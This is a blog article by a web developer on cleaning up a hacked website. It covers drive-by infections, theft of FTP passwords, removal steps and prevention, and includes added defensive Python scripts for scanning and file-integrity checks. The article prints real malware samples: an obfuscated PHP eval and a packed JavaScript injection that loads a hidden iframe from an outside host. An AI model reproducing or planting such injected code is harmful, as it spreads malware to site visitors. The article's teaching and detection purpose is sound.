Malware Recovery: What to Do When Google Says You've Been Hacked

It’s a beautiful Monday morning and you walk into work. You go to sit down and check your website statistics from last week and the weekend and your heart sinks. Your website traffic is down, you have multiple warnings from Google about malware on your website and you have no idea what just happened. Was I hacked? Is this an error? Did that intern just…

No, your staff didn’t mess up the page or fumble the server, your site was compromised. Through various methods, a hacker has accessed your website, uploaded malicious code and skipped out.

Now, your visitors may get their computers infected and your search engine rankings might be at risk. So, what do you do? Continue reading; let’s study the psychology and reasoning of such attacks.

What is a site hack? Why does it happen?

This might be a pretty obvious question. Why would somebody install malware or a virus on a website/computer? Ninety percent of the time it’s for financial gain. Ten percent of the time it’s just for the fun of it. What we’re seeing now is a huge increase in scareware. This is a form of malware that tricks you into buying software to "cure" the infection it reports. The majority of people believe the scareware is a real Microsoft virus scanner — when in reality, the "scanner" is the malware itself acting as scareware.

There could be valuable information on internal networks a hacker might want. They could simply want to spread their malware to as many computers as possible for the purpose of extortion.

So what exactly is a site hack? The answer is simple: somebody accessed and modified code on your website without permission. From my experience, about 99% of the time there is a piece of JavaScript (JS) code that has been added to each index.html/php page.

Once the hacker has access to your website, they will inject this malicious JS code into your files. The code can do a number of things, such as: redirect the user to a different page (usually spam), redirect the website’s PageRank (via links) to the hacker’s site or a client’s site, or, in the worst case, trigger "drive-by" downloading of malware to infect the website’s visitors’ computers. All of these are bad for business, and bad for your users and your staff.

Possible causes

Let’s face it, even top-notch security cannot always protect you. There are backdoors to all web elements, especially if you use a Content Management System (CMS). If you run WordPress, Joomla, SimpleCMS, Magento, or any other open source CMS, there is a strong possibility your site can be compromised through known SQL injection vulnerabilities.

The most common access point for a website malware hack is not the website, but the computers on which it was developed and accessed. Assuming all of the software on your website is up to date, and all of your updates/patches are working fine, you will often see user computers that are infected. How does this happen?

A hacker tries to hack a website, but it’s secure, so he skips it and goes to a less secure site. The hacker accesses that website and installs a malicious script to enable "drive-by" downloads (the ability for the script to auto-install and run malware). A user who is a webmaster, or who has access to a website, visits the site. The JS auto-loads and runs, then installs a copy of the malware on the visitor’s computer.

Remember, our visitor is a webmaster… Once the webmaster visits the compromised site, he may see something funny, like a quick flash on the screen, multiple hourglass icons while the machine is seemingly idle, and an increase in running tasks (on Windows) in the Task Manager.

Now, the webmaster’s computer has the malware installed on it. It’s not on his website — so what gives? How does the malware make it to the website? It’s simple, really…

From this point on, there are no signs that the visitor (or our webmaster) is infected. While the webmaster is working, the malware is working, too – in the background. While the visitor continues their Internet browsing, the malware is scanning known directories for user login details. The malware is looking for – nope, not banking, not PayPal, not Facebook – CoreFTP and FileZilla logins. 

Did you know that most common FTP programs store your passwords in PLAIN TEXT? That means once the malware finds the common directories and locations of stored passwords, the nasty software sends that information to the hacker. Now, the hacker has access to your website to regenerate his malware and redistribute on your website.

How to fix/clean

Cleaning out malware can be a difficult, stressful and time-consuming task. If you’re not too familiar with code, and don’t know what is supposed to "look right" on your website, you might want to call a professional. However, assuming you’re comfortable, there are a few areas you should look into.

The first step is cleaning. You must first flush your system clean of the virus and malware before you attempt a fix. Fixing your website before a program scan and clean will only repeat the cycle, and you will always play catch up. Below is a list of what should be done in an orderly fashion:

  • Report the incident to your hosting provider and/or IT staff.

  • Scan all computers that have access to your website. We mean ALL computers.

  • Run multiple scanning tools. Personally, I suggest the following:  Malware Bytes, SpyBot Search and Destroy, ComboFix and Microsoft Security Essentials. Remember: update your virus scanner before all scans.

  • Scan your startup directory. In Windows, go to Run>msconfig and scan each item.

  • Through your Registry Editor (Windows), scroll through each "Run" entry to look for suspicious items.

  • Change ALL passwords associated with your website, CMS admin sections, FTP, MySQL, control panels, EVERYTHING.

  • Download all of your files from your website (for review and analysis of the hacked code).

If you have a backup of your website, now is the time to restore. If you do not have one, ask whether your hosting company has one. If neither of you does, you will have to manually go through lines of code. Don’t worry; it’s more time-consuming than challenging.

You don’t have a backup of your website? Don’t panic; there is a manual way to remove this code. It’s going to take time, and a lot of searching.

The most logical thing to do would be to download your entire site via FTP and simply sort the files by the date they were modified. Obviously, the compromised files would be the most recently modified. Typically, I’ve seen only index.php files hit. When you scan the code, you want to look for weird obfuscated ("encrypted") JS at the very top or very bottom of the code. Here’s a sample from one recent malware infection (this is a real example):

Encrypted (PHP):
<?php $fyw_jmzlq = array("eNqtWgl32siy/iuMT05sXjyOWg","ugccjFjsHGsWDAgIGZHA4I2SzC","cFjCku…REMOVED-URL…/04U8HHmkbE78MhDn","9VASffpah4/LLvGfj/8PWGX41A","==");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E…removed…\x29\x29\x29\x29\x3B");?>

JS:
<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai|showthread|php|72241732'.split('|'),0,{}))
</sc ript>

As you can see from the above real-world example, this malicious code is usually pretty easy to spot if you know what you’re looking for. If you’re proceeding with a manual removal, you will need to manually review and edit every file infected with the above code. Simply removing the code from the file and re-uploading will cure this problem. Please make sure to double-check all files, both by visually scanning them and then by sorting all of them by modified date — to ensure you captured all compromised files.
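The two manual steps above (sort the downloaded site by modification date, then look at the very top and very bottom of each web file for obfuscated code) can be scripted for a first pass. The following Python script is an added example, not code from the article: it walks a downloaded copy of the site, lists web files newest-first, and flags the obfuscation markers seen in the samples above (the eval(function(p,a,c,k,e,d) packer, eval() fed a hex-escaped string, eval() wrapped around base64/gzinflate, and a hidden 1-pixel iframe). The sample site it builds in a temp directory is constructed for the demo; the file extensions, window size and marker list are assumptions you would tune to your own site.

```python
"""Triage a downloaded copy of a website for injected PHP/JS.

Added example (not the article's code): lists files by modification time and
flags obfuscation markers at the head or tail of each web file, where the
injected code in the samples above was placed.
"""
import os
import re
import tempfile
import time
from datetime import datetime

# Extensions worth inspecting (assumption); images and other assets are skipped.
WEB_EXTENSIONS = {".php", ".phtml", ".inc", ".html", ".htm", ".js"}

# Bytes to inspect at the start and end of each file. Injections usually land
# at the very top or very bottom, so a small window catches them cheaply.
WINDOW = 4096

# Heuristic markers of obfuscated code: (label, compiled regex). Legitimate
# minified libraries can also contain eval(, so hits are leads, not verdicts.
MARKERS = [
    ("packed-js", re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")),
    ("hex-escaped-eval", re.compile(r"eval\(\s*[\"'](?:\\x[0-9a-fA-F]{2}){4,}")),
    ("php-decode-eval", re.compile(r"eval\(\s*(?:gz(?:inflate|uncompress)|str_rot13|base64_decode)\(")),
    ("hidden-iframe", re.compile(r"<iframe[^>]*(?:display\s*:\s*none|width\s*=\s*[\"']?1\b)", re.IGNORECASE)),
]


def list_by_mtime(root):
    """Return (mtime, relative_path) for every web file under root, newest first."""
    entries = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in WEB_EXTENSIONS:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                entries.append((os.path.getmtime(full), rel))
    entries.sort(reverse=True)
    return entries


def scan_file(path):
    """Return [(location, label)] for markers found in the head or tail of one file."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    windows = [("head", text[:WINDOW])]
    if len(text) > WINDOW:
        windows.append(("tail", text[-WINDOW:]))
    hits = []
    for location, chunk in windows:
        for label, pattern in MARKERS:
            if pattern.search(chunk):
                hits.append((location, label))
    return hits


def scan_site(root):
    """Scan every web file under root; return {relative_path: hits}, newest file first."""
    findings = {}
    for _, rel in list_by_mtime(root):
        hits = scan_file(os.path.join(root, rel))
        if hits:
            findings[rel] = hits
    return findings


def build_sample_site():
    """Constructed demo site: two clean files dated a month ago, one freshly injected page."""
    root = tempfile.mkdtemp(prefix="site-")
    os.makedirs(os.path.join(root, "blog"))
    files = {
        "index.php": "<?php echo 'hello'; ?>\n<html><body>Welcome</body></html>\n",
        "app.js": "function greet(n){return 'hi '+n;}\n",
        # Constructed stand-in for a packed-JS injection appended to a page.
        "blog/index.php": "<?php echo 'blog'; ?>\n<html><body>Posts</body></html>\n"
                          "<script>eval(function(p,a,c,k,e,d){return p}('',0,0,''.split('|'),0,{}))</script>\n",
    }
    month_ago = time.time() - 30 * 86400
    for rel, body in files.items():
        full = os.path.join(root, rel)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
        if rel != "blog/index.php":
            os.utime(full, (month_ago, month_ago))
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for mtime, rel in list_by_mtime(site):
        print(datetime.fromtimestamp(mtime).strftime("%Y-%m-%d %H:%M"), rel)
    for rel, hits in scan_site(site).items():
        print("SUSPECT", rel, hits)
```

Run it against the directory you downloaded over FTP instead of the demo site, and review every file it names by hand, since a clean minified library can also trip the eval() markers. Treat the date ordering as a hint only: an intruder who can write files can also set their timestamps, so a clean file list from a backup is the stronger reference.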

The problem is not solved yet. Assuming your website was hit with malware, you should review your Google/Bing Webmaster Tools to verify that you fixed every problem Google/Bing found. Usually, this is simply done with a response to a notification or a reconsideration request. Google is very good at restoring rankings once a problem is fixed. You should allow 7-14 days for this to fully process.

Prevention

Depending on the size of your site and compromise, a situation like this could put your website offline for days, if not weeks — costing you business and visitors. So, what can be done to not be one of the victims? Here are a few good ideas.

If you run a CMS (such as Joomla or WordPress) on your website, there are a few security measures you should take, such as:

  • keep your CMS updated;

  • hide default login areas (such as /administrator or /wp-admin);

  • change default user names (most CMSes have "admin" as the default login, so try to change this to something a bit more personalized and secure);

  • ensure your hosting provider keeps their servers secure; and

  • install and configure backup utilities.
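A backup utility gives you more than a way to restore: a known-good copy is also a baseline you can diff against to find every file an intruder added, changed or removed, which is quicker and more reliable than sorting by date. The following Python script is an added example, not the article's or any backup tool's code. It records a SHA-256 manifest of a clean site (assumed to be stored somewhere the web server cannot write to) and compares a fresh manifest against it; the demo site and the simulated tampering are constructed for the example.

```python
"""File-integrity baseline for a website (added example, not the article's code).

Take a manifest of a known-good copy right after a clean deploy or backup,
keep it off the web server, and diff a fresh manifest against it after an
incident or on a schedule. Timestamps can be forged; content hashes cannot.
"""
import hashlib
import json
import os
import tempfile


def build_manifest(root):
    """Map each file under root (path relative to root, '/'-separated) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def compare_manifests(baseline, current):
    """Return sorted lists of paths that were added, removed or modified since the baseline."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths if baseline[p] != current[p]),
    }


def save_manifest(manifest, path):
    """Write the manifest as JSON; store it outside the web root, ideally off the server."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def load_manifest(path):
    """Read a manifest written by save_manifest()."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def demo():
    """Constructed scenario: baseline a tiny site, then simulate a compromise and diff."""
    root = tempfile.mkdtemp(prefix="site-")
    os.makedirs(os.path.join(root, "wp-content"))
    clean = {"index.php": "<?php echo 'ok'; ?>\n", "wp-content/theme.css": "body{}\n"}
    for rel, body in clean.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    baseline = build_manifest(root)

    # Simulated tampering (constructed): one page altered, one file dropped in, one deleted.
    with open(os.path.join(root, "index.php"), "a", encoding="utf-8") as fh:
        fh.write("<script>/* injected (constructed) */</script>\n")
    with open(os.path.join(root, "wp-content", "cache.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php /* dropped-in file (constructed) */ ?>\n")
    os.remove(os.path.join(root, "wp-content", "theme.css"))

    return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Regenerate the baseline after every legitimate deploy or CMS update, otherwise your own changes show up as "modified". Files the CMS rewrites at runtime (caches, uploads) will also appear; exclude those directories from the walk or keep a separate, more permissive baseline for them.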

So, as you can tell, there are multiple areas that need to be protected here. Keeping your website secure means that you need to keep your personal computer secure, as do any co-workers or firms who have access to your website. You’re ALL responsible for keeping your website protected. Remember, you must ensure that all computers that are accessing your website via FTP are secure as well. Here are some basic steps you can take:

  • Keep up with OS updates and patches.

  • Keep all software updated and patched.

  • Regularly scan your computer with the aforementioned software – and keep in mind that your anti-virus software is useless if you do not keep it updated.

  • Do NOT save your passwords in your FTP programs.

  • If you have multiple FTP users, assign different rights to different users. Avoid giving all users access to the entire FTP root.

Author bio: Josh Zehtabchi is a professional web developer and SEO by trade. Josh graduated with a computer science degree and has been a web developer for over 10 years and a professional SEO for over 5 years. With clients that range from: FEMA, Pepsi Bottling Company, Motorola, The Atlanta Symphony and VMX Technologies, Josh’s SEO skills are widely ranged in many niche industries.

You can find Josh professionally at: http://www.v2interactive.net and  http://www.joshz.net.

You can also find Josh on the following social sites:

https://www.facebook.com/jzehtabchi

http://www.linkedin.com/in/joshzehtabchi

https://plus.google.com/112687311676111255689/posts